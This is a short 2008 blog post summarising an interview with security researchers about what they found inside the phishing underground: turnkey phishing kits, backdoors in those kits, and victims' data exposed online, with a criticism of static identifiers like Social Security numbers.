Spies in the Phishing Underground

February 1, 2008 at 10:36 pm 2 comments

Recently there was a good interview with Nitesh Dhanjani and Billy Riosin in Help Net Security. “Both Nitesh and Billy are well-known security researchers that have recently managed to infiltrate the phishing underground.”

Some interesting points they made from their undercover days are:

– The average phisher is not a super-smart techie. Phishing kits have made executing attacks trivial. Most phishing sites are a variant of a small set of phishing kits. “Many think that phishing sites are all custom jobs that a particular phisher has developed and deployed. The reality is pre-made, ready-to-deploy, turnkey sites are already created for practically every major organization that you can think of.”

– Many of the phishing kits have backdoors written into the source code so that phishers can phish the phishers.

– One of the “techniques” used by Nitesh and Billy was a simple Google search for a static string in a popular phishing kit. “The results completely stunned us. Social Security numbers, bank account numbers, dates of birth, ATM PINs, addresses, credentials to online banking accounts, all out in the open, a lot of which was collected from victims only a few hours ago.”

– They believe that the core problem is the use of static identifiers, particularly Social Security Numbers and credit card numbers. “Unfortunately, financial institutions only take into account their cost when making this decision, but it also ends up affecting the lives of millions of people who have to pay with their identities when such fraud is committed.”

I’m pleased that their recommended solution for fighting phishing wasn’t along the lines of better user education will solve all the problems.


Entry filed under: fraud, personal_info, security.

Webstock shaping up as a must-attend NZ: Privacy reality check

2 Comments Add your own

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed

This blog is no longer updated. See the About page for more info. I'm currently active on Twitter.

Follow me on twitter


%d bloggers like this: